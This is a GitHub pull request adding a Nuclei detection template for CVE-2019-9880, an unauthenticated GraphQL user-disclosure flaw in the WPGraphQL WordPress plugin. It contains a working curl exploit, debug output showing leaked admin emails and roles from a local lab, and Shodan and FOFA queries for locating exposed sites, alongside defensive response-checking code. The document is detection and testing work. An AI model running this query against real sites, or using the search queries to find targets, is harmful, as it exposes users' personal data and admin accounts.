ADD CVE-2019-9880 (vKEV) #13285

Merged
princechaddha merged 5 commits into projectdiscovery:main from intelligent-ears:ADD-CVE-2019-9880
Sep 17, 2025

@intelligent-ears
Contributor

Template / PR Information

Template Validation

I've validated this template locally

  • YES

  • NO

  • Here's the exploit I ran locally

┌──(kali㉿kali)-[~/Desktop/wplab]
└─$ curl -X POST http://localhost:8000/?graphql \
  -H "Content-Type: application/json" \
  -d '{"query": "query { users { nodes { id name email username roles } } }"}'
{"data":{"users":{"nodes":[{"id":"dXNlcjox","name":"admin","email":"intelears@test.com","username":"admin","roles":["administrator"]}]}}}
  • Here's the Nuclei Debug:
┌──(kali㉿kali)-[~/…/nuclei-templates/http/cves/2019]
└─$ nuclei -u http://localhost:8000 -t CVE-2019-9880.yaml -debug   

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.6

		projectdiscovery.io

[INF] Current nuclei version: v3.4.6 (outdated)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2019-9880] Dumped HTTP request for http://localhost:8000/?graphql

POST /?graphql HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.1
Connection: close
Content-Length: 71
Content-Type: application/json
Accept-Encoding: gzip

{"query": "query { users { nodes { id name email username roles } } }"}
[DBG] [CVE-2019-9880] Dumped HTTP response http://localhost:8000/?graphql

HTTP/1.1 200 OK
Connection: close
Content-Length: 138
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 600
Content-Type: application/json; charset=UTF-8
Date: Tue, 16 Sep 2025 22:15:28 GMT
Server: Apache/2.4.25 (Debian)
X-Content-Type-Options: nosniff
X-Hacker: If you're reading this, you should visit github.com/wp-graphql and contribute!
X-Powered-By: PHP/7.2.18
X-Robots-Tag: noindex

{"data":{"users":{"nodes":[{"id":"dXNlcjox","name":"admin","email":"intelears@gmail.com","username":"admin","roles":["administrator"]}]}}}
[CVE-2019-9880:dsl-1] [http] [critical] http://localhost:8000/?graphql ["admin","intelears@gmail.com"]
[INF] [CVE-2019-9880] Dumped HTTP request for http://localhost:8000/graphql

POST /graphql HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36
Connection: close
Content-Length: 71
Content-Type: application/json
Accept-Encoding: gzip

{"query": "query { users { nodes { id name email username roles } } }"}
[DBG] [CVE-2019-9880] Dumped HTTP response http://localhost:8000/graphql

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 282
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 16 Sep 2025 22:15:28 GMT
Server: Apache/2.4.25 (Debian)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /graphql was not found on this server.</p>
<hr>
<address>Apache/2.4.25 (Debian) Server at localhost Port 8000</address>
</body></html>
[INF] Scan completed in 52.670946ms. 1 matches found.

Additional Details

  • Vulnerability Type: Authentication bypass leading to information disclosure
  • Attack Vector: GraphQL query to enumerate WordPress users without authentication
  • Affected Versions: WPGraphQL plugin version 0.2.3 and earlier
  • WordPress Setup Requirements:

Setup Details

  • WordPress installation with WPGraphQL plugin version 0.2.3 or earlier
  • No authentication required - this is an unauthenticated vulnerability
  • GraphQL endpoint accessible at /?graphql or /graphql

Query details:

  • query { users { nodes { id name email username roles } } }
  • FOFA Query: body="/wp-content/plugins/wp-graphql/"
  • Shodan Query: http.title:"WordPress" "graphql"
  • PublicWWW Query: "/wp-content/plugins/wp-graphql/"

Additional References:

@DhiyaneshGeek DhiyaneshGeek requested review from pussycat0x and removed request for ritikchaddha September 16, 2025 23:15
@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Sep 16, 2025
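
Added example (not part of the pull request or the merged template): the two debug responses above differ in status, content type and body, so a check for this disclosure should test the response structure rather than keywords. The Python code below reports a finding only for an HTTP 200 JSON response that carries a non-empty email, username or roles value under data.users.nodes. The sample responses, the example.test address and the helper names are constructed, and the null-field response is an assumed shape for an endpoint that enforces access control.

```python
import json

# Fields requested by the query on this page that identify accounts.
SENSITIVE = ("email", "username", "roles")

# Constructed (status, content type, body) samples modelled on the debug output above.
SAMPLES = {
    "open": (200, "application/json; charset=UTF-8",
             '{"data":{"users":{"nodes":[{"id":"dXNlcjox","name":"admin",'
             '"email":"admin@example.test","username":"admin",'
             '"roles":["administrator"]}]}}}'),
    "not_found": (404, "text/html; charset=iso-8859-1",
                  "<html><title>404 Not Found</title></html>"),
    # Assumed shape: sensitive fields resolve to null when access is enforced.
    "restricted": (200, "application/json; charset=UTF-8",
                   '{"data":{"users":{"nodes":[{"id":"dXNlcjox","name":"admin",'
                   '"email":null,"username":null,"roles":null}]}}}'),
    # An HTML page that merely mentions the keywords must not match.
    "html_keywords": (200, "text/html; charset=UTF-8",
                      "<p>users nodes email username roles</p>"),
}

def _dig(obj, *keys):
    """Walk nested dicts, returning None as soon as the path breaks."""
    for key in keys:
        if not isinstance(obj, dict):
            return None
        obj = obj.get(key)
    return obj

def exposed_users(status, content_type, body):
    """Return the sensitive fields leaked per user node, or [] if none."""
    if status != 200 or "application/json" not in content_type.lower():
        return []
    try:
        nodes = _dig(json.loads(body), "data", "users", "nodes")
    except ValueError:  # body is not JSON despite the header
        return []
    if not isinstance(nodes, list):
        return []
    leaked = []
    for node in nodes:
        if isinstance(node, dict):
            fields = {f: node[f] for f in SENSITIVE if node.get(f)}
            if fields:
                leaked.append(fields)
    return leaked

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, exposed_users(*sample))
```

Run against a response captured from your own site after upgrading the plugin, an empty list means none of the three fields came back populated.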
@DhiyaneshGeek
Member

Validated Locally

LGTM !

nuclei -u http://localhost:8080 -t test.yaml -vv   

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2019-9880] WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure (@intelligent-ears) [critical]
[CVE-2019-9880:user-data] [http] [critical] http://localhost:8080/graphql ["username: test, email: test@gmail.com","username: hehe, email: hehe@test.com"]

@princechaddha princechaddha merged commit 9f6ac73 into projectdiscovery:main Sep 17, 2025
3 checks passed
@princechaddha
Member

/tip 200

@algora-pbc

algora-pbc Bot commented Sep 18, 2025

Please visit Algora to complete your tip via Stripe.

@algora-pbc

algora-pbc Bot commented Sep 18, 2025

💎 $200 bounty • ProjectDiscovery Bounty Available for CVE Template Contribution

Steps to Contribute:

  • Claim attempt: Comment /attempt #13285 on this issue to claim attempt. Multiple participants can attempt, but only the first to submit a complete POC template along with full debug data will receive the reward, similar to bug bounty programs.
  • Write the Template: Create a high-quality Nuclei template for the specified CVE, following our Contribution Guidelines and Acceptance Criteria.
  • Submit the Template: Open a pull request (PR) to projectdiscovery/nuclei-templates and include /claim #13285 in the PR body to claim the bounty.
  • Receive Payment: Upon successful merge of your PR, you will receive 100% of the bounty through Algora.io within 2-5 days. Ensure you are eligible for payouts.

Thank you for contributing to projectdiscovery/nuclei-templates and helping us democratize security!

Acceptance Criteria: The template must include a complete POC and should not rely solely on version-based detection. Contributors must share vulnerable setup information or a testable instance by emailing templates@projectdiscovery.io. Providing a testable instance significantly reduces validation time and increases the chance of quicker rewards. Templates that are incomplete, invalid, or non-verifiable will not be accepted. Avoid submitting code templates for CVEs that can be detected using HTTP, TCP, or JavaScript only; these are blocked by default and will not produce results. Exceptions may apply for certain cases. Do not submit AI-simulated vulnerable environments. To qualify for the bounty, the team must be able to fully validate the POC. If you have hosted a vulnerable environment for validation, send the details (IP or Docker setup) along with the PR number to templates[at]projectdiscovery.io

You can check the FAQ for the Nuclei Templates Community Rewards Program here.


@algora-pbc algora-pbc Bot added the $200 label Sep 18, 2025
@intelligent-ears
Contributor Author

/attempt #13285

@algora-pbc

algora-pbc Bot commented Sep 18, 2025

🎉🎈 @intelligent-ears has been awarded $200 by ProjectDiscovery! 🎈🎊

@intelligent-ears intelligent-ears deleted the ADD-CVE-2019-9880 branch September 26, 2025 02:54